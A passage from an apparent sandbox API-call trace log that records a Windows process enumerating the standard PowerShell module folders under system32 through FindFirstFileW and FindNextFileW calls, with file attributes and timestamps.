hFindFile=0x2386d70a010, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0198.774] FindClose (in: hFindFile=0x2386d70a010 | out: hFindFile=0x2386d70a010) returned 1 [0198.774] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0198.774] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0xafa508ddc0 | out: lpFindFileData=0xafa508ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d70a490 [0198.775] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.775] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0198.775] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0198.776] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0198.776] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0198.776] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0198.776] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0198.776] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0198.778] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0198.778] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0198.779] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0198.779] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0198.779] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0198.779] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0198.779] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0198.780] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0198.780] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0198.780] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0198.780] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0198.780] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0198.781] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0198.781] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0198.781] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0198.781] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0198.781] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0198.782] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0198.782] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0198.782] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0198.782] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0198.782] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0198.783] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0198.783] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0198.783] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0198.783] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0198.783] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0198.784] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0198.784] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0198.784] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0198.784] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0198.784] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0198.785] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0198.785] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0198.785] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0198.785] FindNextFileW (in: hFindFile=0x2386d70a490, lpFindFileData=0xafa508dd80 | out: lpFindFileData=0xafa508dd80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, 